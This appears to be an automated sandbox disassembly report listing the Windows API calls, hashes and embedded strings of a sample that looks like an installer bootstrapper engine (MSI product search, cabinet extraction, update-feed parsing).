                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 71445658-955085611
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 006035F8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00603609,00000000,?,00000000), ref: 00603069
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005EC025,?,005C5405,?,00000000,?), ref: 00603075
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 52713655-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,005F1F87,?,0000015D,?,?,?,?,005F33E0,000000FF,00000000,?,?), ref: 005F524C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,005D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 005C34D5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPath
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a4f0ad5fdc835878f3f4111e103a77ddd651e9e21760ca891b670c4acfb40621
                                                                                                                                                                                                                                                                                                  • Instruction ID: 374e6799f613f348f66acc44a754224ced7bc71a24c6345a34515fb8b9489bbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4f0ad5fdc835878f3f4111e103a77ddd651e9e21760ca891b670c4acfb40621
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89E012722012297FEB062EE15C09EAB7F5CBF45354B00C059FE40D6111D766E95097B5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01855b312ee048b87cc9501387344216d9897952749f5277cb8f8426d2c657c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b5775937aa8ce3700147d08644a7174a3bc99d822a6fe0dbc313a2025916f31
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01855b312ee048b87cc9501387344216d9897952749f5277cb8f8426d2c657c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B012B52BBC11BD764C15513C06C37050FC6C1F22331C66EB440C1081A8C00D408472
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2c61f3a43d9b78d0ae7d7bd535ce6a722dab858d651a99c983921f4f52f0adc
                                                                                                                                                                                                                                                                                                  • Instruction ID: d474ab98f04f4a8bf7c33dd44bda860c6ba42b41f0f750cfcc2e839b747bd4e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2c61f3a43d9b78d0ae7d7bd535ce6a722dab858d651a99c983921f4f52f0adc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90B012B12BBC11AE768C55553D07C37050FC6C6F22331856EB040C2081E8C40D414532
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: dca3663d55d3974249ca039533ba08f7fc7aea860b8b7d1ea59332dedbe9a8c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a77a3520d6b60d18933a4482e257a7b5e5d8de27f45efba4e73105db5026471
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dca3663d55d3974249ca039533ba08f7fc7aea860b8b7d1ea59332dedbe9a8c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4B012B12BBD11AD768C56553C06C37050FC6C5F22331C66EF040C2081E8C00D804532
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b46b624d2c8cba9fcaff920a8335dc959ac4655733e4e89e72bb92b525867b86
                                                                                                                                                                                                                                                                                                  • Instruction ID: 38a6c2a2e38d4fff17a051890e66c293e8d677d61885370385a1cbb4ca51598b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b46b624d2c8cba9fcaff920a8335dc959ac4655733e4e89e72bb92b525867b86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B012A12FA812ADB68C51453C03C37070FC6C0B12331C11EB400C21C2E8C00C458532
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: HeapSize.KERNEL32(00000000,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BE2
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(000001C7,000001C7,80004005,00000000,?,cabextract.cpp,000001C7), ref: 005C139C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3492610842-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00623E78,000000FF,?,?,?), ref: 006071D4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 006071F9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00607219
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00607235
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0060725D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00607279
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 006072B2
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 006072EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00606D50: SysFreeString.OLEAUT32(00000000), ref: 00606E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00606D50: SysFreeString.OLEAUT32(00000000), ref: 00606EC8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0060736F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0060741F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 318886736-4294603148
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00608161
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0060817C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0060821F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0060B518,00000000), ref: 0060825E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 006082B1
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,0060B518,000000FF,true,000000FF), ref: 006082CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00608307
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0060844B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3037633208
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45d160fdc69c0a81a918dcdf09c1c567ebb437598184813727ac85838ef75aa6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19874a102214621ecba61439f051167e41f9d95dbc479ab3c42f4eb88c2fed20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d160fdc69c0a81a918dcdf09c1c567ebb437598184813727ac85838ef75aa6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B17C31584606AFCB24DF94CC85F9B7BA7AF44730F258668F9A5AB2D1DB70E841CB40
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 005CA0B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2134270738
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6816b09fb17aaf51b654b6a1a1fd8d7625f39013f800f16fc365d06a4e7f3133
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ed223fd7001f0c0554f953cf31441f496a2b467cfc87f1d70b1dbc1a724fc57
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6816b09fb17aaf51b654b6a1a1fd8d7625f39013f800f16fc365d06a4e7f3133
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C961B036D8012DAFDB159AE88D49FAF7F6AFB44318F14056DF900BA281D2339E00D792
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 005DF06E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 005DF19B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy the arguments., xrefs: 005DF12D
                                                                                                                                                                                                                                                                                                  • Failed to copy the id., xrefs: 005DF100
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 005DF17C
                                                                                                                                                                                                                                                                                                  • Failed to post launch approved exe message., xrefs: 005DF186
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 005DF089
